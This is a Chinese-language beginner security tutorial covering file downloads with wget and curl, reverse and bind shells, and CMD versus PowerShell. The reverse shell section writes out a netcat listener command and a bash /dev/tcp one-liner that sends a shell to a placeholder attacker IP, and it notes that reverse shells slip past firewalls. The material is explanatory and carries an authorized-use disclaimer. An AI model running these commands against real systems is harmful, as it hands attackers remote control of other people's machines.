002-基础

操作系统

文件下载

不同操作系统的文件下载方式:

1. linux文件下载

  • wget:一个命令行工具,用于从网络上下载文件。
  • curl:另一个命令行工具,也用于从网络上下载文件,但与wget相比,curl的功能更为强大,可以支持更多的协议和特性。

在Linux操作系统中,可以使用命令行工具wget来进行文件在线下载,步骤如下:

打开终端窗口,进入要下载文件的目录。

在终端中输入命令:wget <文件URL>,其中<文件URL>是要下载文件的URL链接地址。

例如,要下载一个名为test.zip的文件,该文件的URL链接地址为https://example.com/test.zip,可以在终端中输入命令:

1
wget https://example.com/test.zip

,然后按下回车键开始下载。

下载完成后,可以在当前目录下找到下载的文件。
需要注意的是,有些文件需要登录或认证才能下载,此时可以在wget命令后添加登录信息或cookie信息,具体命令可以使用wget的帮助文档来查询。另外,如果要下载的文件比较大,可以使用wget命令的”-c”选项来实现断点续传,这样可以在下载中断后,重新开始下载,而不需要重新下载整个文件。

Windows和Mac环境下的文件安装与下载

不同操作系统上的编程语言环境搭建

2. 反弹shell

反弹shell(Reverse Shell)是一种攻击技术,可以让攻击者通过向目标系统发送命令来获取对目标系统的控制权限。具体来说,反弹shell的攻击过程如下:

  • 攻击者在自己的计算机上启动一个监听程序,监听某个端口。

  • 攻击者在目标系统上运行一个恶意程序,该程序会与攻击者计算机上的监听程序建立连接,并将目标系统上的shell进程的控制权交给攻击者。

  • 攻击者在自己的计算机上可以通过该连接向目标系统发送命令,获得对目标系统的完全控制。

反弹shell的实现步骤如下:

攻击者在自己的计算机上启动一个监听程序,监听某个端口。可以使用netcat(nc)命令或其他监听工具来实现。

例如,在攻击者的计算机上运行如下命令:

1
nc -lvnp 4444

这个命令启动了一个监听程序,监听4444端口,并等待与目标系统建立连接。

在目标系统上运行一个恶意程序,该程序会与攻击者计算机上的监听程序建立连接,并将目标系统上的shell进程的控制权交给攻击者。可以使用各种漏洞或社会工程学攻击手段来诱使目标系统上的用户或进程运行恶意程序。

例如,在目标系统上运行如下命令:

1
/bin/bash -c "/bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1"

这个命令会启动一个bash shell进程,将其标准输入和输出(stdin和stdout)重定向到一个TCP连接上,该TCP连接将与攻击者计算机上的监听程序建立连接,并将控制权交给攻击者。

攻击者在自己的计算机上可以通过该连接向目标系统发送命令,获得对目标系统的完全控制。

需要注意的是,反弹shell是一种非常危险的攻击技术,仅限于安全测试或授权的渗透测试使用。在未经授权的情况下使用反弹shell技术可能会导致法律问题。

正向连接(正向shell)是指攻击者通过向目标系统发送命令,让目标系统与攻击者的计算机建立连接,从而获得对目标系统的控制权限。正向连接的实现方式比较简单,但需要攻击者知道目标系统的IP地址和端口号。

反向连接(反弹shell)则是指攻击者在自己的计算机上启动一个监听程序,并等待目标系统主动连接。一旦目标系统连接到攻击者计算机上的监听程序,攻击者就可以获得对目标系统的控制权限。反向连接的实现方式比正向连接复杂一些,但可以避开一些网络安全设备和防火墙的检测。

总的来说,正向连接反向连接都是获取对目标统控制权限的攻击技术。正向连接需要攻击者知道目标系统的IP地址和端口号,而反向连接则需要在目标系统上运行一个恶意程序,与攻击者计算机上的监听程序建立连接。在实际应用中,攻击者会根据具体情况选择使用哪种连接方式。

3. windows中的powershell和cmd

CMD(Command Prompt)是Windows系统自带的命令行工具,它提供了一种使用命令行方式来操作计算机的方式,可以用于执行各种系统命令和脚本。CMD使用的是Windows的命令提示符界面,界面简单,但可用的命令比较有限。

PowerShell是一种面向对象的脚本语言和命令行工具,它集成了.NET Framework和Windows管理框架(WMI),可以方便地管理Windows系统、服务、进程和事件等。与CMD不同,PowerShell使用的是一种称为PowerShell命令行界面(PowerShell Command Line Interface,简称PS CLI)的界面,支持使用命令行、脚本和GUI界面三种方式操作计算机,可用的命令和功能更加丰富和强大。

总的来说,CMD和PowerShell都是Windows系统中的命令行工具,但PowerShell比CMD更加强大和灵活,可以方便地编写复杂的脚本和管理任务。